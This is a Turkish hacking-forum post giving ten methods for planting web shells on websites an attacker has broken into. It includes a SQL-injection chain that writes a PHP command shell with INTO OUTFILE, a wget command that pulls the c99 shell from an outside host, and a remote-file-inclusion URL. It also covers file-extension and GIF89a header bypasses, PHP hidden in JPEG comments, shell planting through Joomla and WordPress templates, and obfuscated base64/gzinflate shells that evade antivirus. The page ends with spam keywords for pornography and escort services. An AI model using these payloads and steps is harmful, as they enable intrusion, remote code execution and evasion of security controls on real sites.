KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Bir Siteye Shell Atmanın 10 Yöntemi
Konu : Bir Siteye Shell Atmanın 10 Yöntemi - 08.08.2016, 10:27
Mesaj: #1
Birçok kişi bir siteye erişim elde ettikten sonra Shell atmaya calisir. Ancak birkaç yöntem denemesine rağmen başaramaz ve pes eder. Bu konuda sizlere 10 Shell atma yöntemini anlatacagim. 


1. Yontem
Bazi eski sitelerde sadece script tabanli dosya uzanti kontrolu yapilir. Bu kontrolu asmak icin scriptin sonuna .gif, .jpg, .doc, .html gibi uzantilar eklenerek bu sinirlama asilabilir. Ornegin; atmak istediginiz shell adi solver.php ise dosya adinisolver.php.jpg seklinde degistirerek bu yontemi deneyebilirsiniz.

2. Yontem

Eger WAF veya antivirus shell atmanizi engelliyorsa, oncelikle basit birkac satirdan olusan bir uploader script yuklemeyi deneyin. Uploader’i yukledikten sonra shellinizi atmayi deneyin.

3. Yontem

Bazi guvenlik duvarlari yuklenecek dosyanin basligini kontrol ederek izin verilip verilmeyecegine bakabilir. Boyle bir guvenligi bypass etmek icin yuklemek istediginiz shell’i notepad ile acin ve en ust satira GIF89a; yazin. Bu sekilde server’i dosyanin bir gif resmi olduguna inandirabilirsiniz. Bu yontemi 1 numarali yontemle birlestirirseniz sansiniz daha da artar.

4. Yontem

Diyelimki sitede bir SQL Injection acigi buldunuz. Bu acigi kullanarak shell atmaniz mumkundur. bunun icin su sekilde calisin:
http://www.site.com/index.php?id=2 adresinde sql injection olsun.
http://www.site.com/index.php?id=2+order+by+6– diyerek kolon sayimizi buluyoruz.
http://www.site.com/index.php?id=-2+union+all+select+1,2,3,4,5,6– yazarak hangi kolondan komut yurutecegimize bakalim.
http://www.site.com/index.php?id=-2+union+all+select+1,2,current_user,4,5,6– diyerek mevcut kullanici adini ogreniyoruz. Diyelimki SOLVER olsun.
http://www.site.com/index.php?id=-2+union+all+select+1,2,file_priv,4,5,6+FROM+mysql.user WHERE+user=’SOLVER’– komutuyla kullanicinin gerekli izinleri varmi diye kontrol ediyoruz. Cikan sonucta Y yazarsa yetki vardir. Yoksa bu yontemi denemeyin. Biz var oldugunu dusunelim.
Simdi sitenin server uzerindeki yolunu ogrenin. Bunu yapmanin bircok yolu var. En basitinden SQL Injection yaparken bir hata alirsaniz oradan bulabilirsiniz. Ornegin “/home/mahmutesat.com/public_html” bizim yolumuz olsun.
Daha sonra site uzerinde yazma yetkisi olan bir dizin bulmamiz gerekli. Genellikle image dizinlerinin yazma yetkisi vardir.
Artik shell yazma komutumuza gecebiliriz:
http://www.site.com/index.php?id=-2+union+all+select+1,2,<?system($_REQUEST[’cmd’]);?>,4,5,6+into+outfile+’/home/mahmutesat.com/public_html/images/solver.php’–
Shell dosyamiza http://www.site.com/images/solver.php seklinde erisebiliriz.
Site uzerinde komut calistirmak için http://www.site.com/images/solver.php?cmd=pwd ya da http://www.site.com/images/solver.php?cmd=uname -a gibi linux komutlari deneyebiliriz.
Daha kapsamli bir shell atmak icin ise http://www.site.com/images/solver.php?cmd=wgethttp://www.shellsitesi.com/c99.txt komutu ile hedef siteye shell cagirabilirip kaydedebilirsiniz.
Daha sonra bu kaydettigimiz txt formatindaki shell’i http://www.site.com/images/solver.php?cmd=mv c99.txt c99.php komutuyla php formatina donusturup erisebilirsiniz.

5. Yontem

Bazi sitelerin FTP girisleri oldukca guvensizdir. Sifreleri kolayca tahmin edilebilir ya da bazen anonymous girisleri acik olur. Bu gibi durumlarda siteye direk FTP ile baglanilarak shell upload edilebilir.

6. Yontem

edjpgcom.exe programini indirin. (https://perlscriptsdb.googlecode.com/files/edjpgcom.exe) Bu program Windowsuzerinde calisir ve JPG, JPEG dosyalarina JPEG Comment eklemeye yarar. Programin kullanimi su sekildedir:
Programi masaustunde bir klasore kopyalayin. Daha sonra ayni klasore istediginiz bir JPG resim dosyasini kopyalayin. Resim dosyasini surukleyip programin ustune birakin. Programin acildigini ve bos bir kutu oldugunu goreceksiniz. Bubos kutu icerisine shell kodlarinizi yazin. Ancak burada dikkat etmeniz gereken sey sudur: Butun bir shell’i orayasigdiramazsiniz. O yuzden ufak cmd kodunu deneyin.
“; system($_GET[’cmd’]); echo ?>

7. Yontem 
(Joomla)

Hazir sitelere shell atmanin bircok yolu vardir. Bazen eklentilerden kaynaklanan shell upload aciklari ya da farkli aciklarolabilir. Bunlara girmeyecegim. Eger panele erisiminiz varsa buradan nasil shell atilir onu anlatacagim.
Ilk yontem tema duzenlemedir. Panelde Template Manager’a tiklayin, oradan da herhangi bir temaya tiklayin. Acilan sayfada sag ustteki Edit butonuna tiklayin ve sonra da Edit html’e tiklayin. Cikan bos alana shell kodunu yapistirin. Boylece shellinizi sisteme attiniz. Shell’e erismek için http://hedefsite.com/templates/beez/index.php adresi seklinde kullanabilirsiniz.
Ikinci yontem olarak tema eklemeyi deneyebilirsiniz. Joomla surumune uygun bir tema bulup indirin. Tema dosyalarindan birisini acin ve kodlarini shell kodlari ile degistirin. Daha sonra da yeni tema ekle diyerek siteye yukleyin. Bu sekilde sisteme shell atmis olursunuz.
Ucuncu yontem ise Plugin yukleme secenegidir. Ayni tema yukleme gibi plugin dosyalari arasina shell atarak yeni plugin yukleyin ve sistemde shelliniz hazir olur.

8. Yontem 
(Wordpress)
Admin paneline girdikten sonra Appearance’a gelin ve editor’e tiklayin. Sag taraftan 404.php linkine tiklayin. Acilan kutuda dosya icerigini goreceksiniz. Buraya shell kodlarinizi yapistirin. Shell’inize http://www.hedefsite.com/wp-content/themes/tema-adi/404.php seklinde erisebilirsiniz.
Ayni Joomla’da oldugu gibi WordPress’te de plugin ve tema yukleyerek de shell atabilirsiniz.

9. Yontem

Bazi sitelerde de RFI yani uzaktan dosya calistirma acigi bulunmaktadir. Bu acigi bulursaniz, farkli bir siteye shell’inizi txt formatinda yukleyin. Daha sonra da uzaktan bu shell’i acik bulunan sitede cagirarak siteye shell atabilirsiniz. Ornegin:
http://www.site.com/index.php?sayfa=http://www.example.com/solver.txt

10. Yontem

Bazen server uzerinde guclu antivirusler ve guvenlik duvarlari bulunur. Siz shell’inizi upload etseniz bile bunlar yakalar ve hemen silerler. Bu gibi durumlarda yapmaniz gereken Undetected bir shell bulmaktir. eval(gzinflate(base64_decode(, ya da preg_replace(”/.*/e”,”\\\\\\\\x65\\\\\\\\x76\\\\\\\\x61\\\\\\\\x6C\\\\\\\\x28\\\\\\\\x67\\\\\\\\x7A\\\\\\\\x69\\\\\\\\x6E\\\\\\\\x66\\\\\\\\x6C\\\\\\\\x61\\\\\\\\x74\\\\\\\\x65\\\\\\\\x28\\\\\\\\x62\\\\\\\\x61\\\\\\\\x73\\\\\\\\x65\\\\\\\\x36\\\\\\\\x34\\\\\\\\x5F\\\\\\\\x64\\\\\\\\x65\\\\\\\\x63\\\\\\\\x6F\\\\\\\\x64\\\\\\\\x65\\\\\\\\x28’seklinde baslayan sifrelenmis bir shell bulursaniz bu sorunu cozebilirsiniz. Ancak dikkat etmeniz gereken sey, bu sekilde sifrelenmis shelllerin icerisinde genellikle logger bulunur. Kullanmadan once bunlari temizlemeniz gerekir.


Bu sekilde 10 farkli shell atma yontemini gostermis olduk. Bunlarin haricinde de bircok yontem bulunmaktadir. Ancak bu yontemlerin hepsini kavradiktan sonra kendiniz digerlerini cozebilirsiniz
İmage

Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
hd porno antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort ataşehir escort türk ifşa hd porno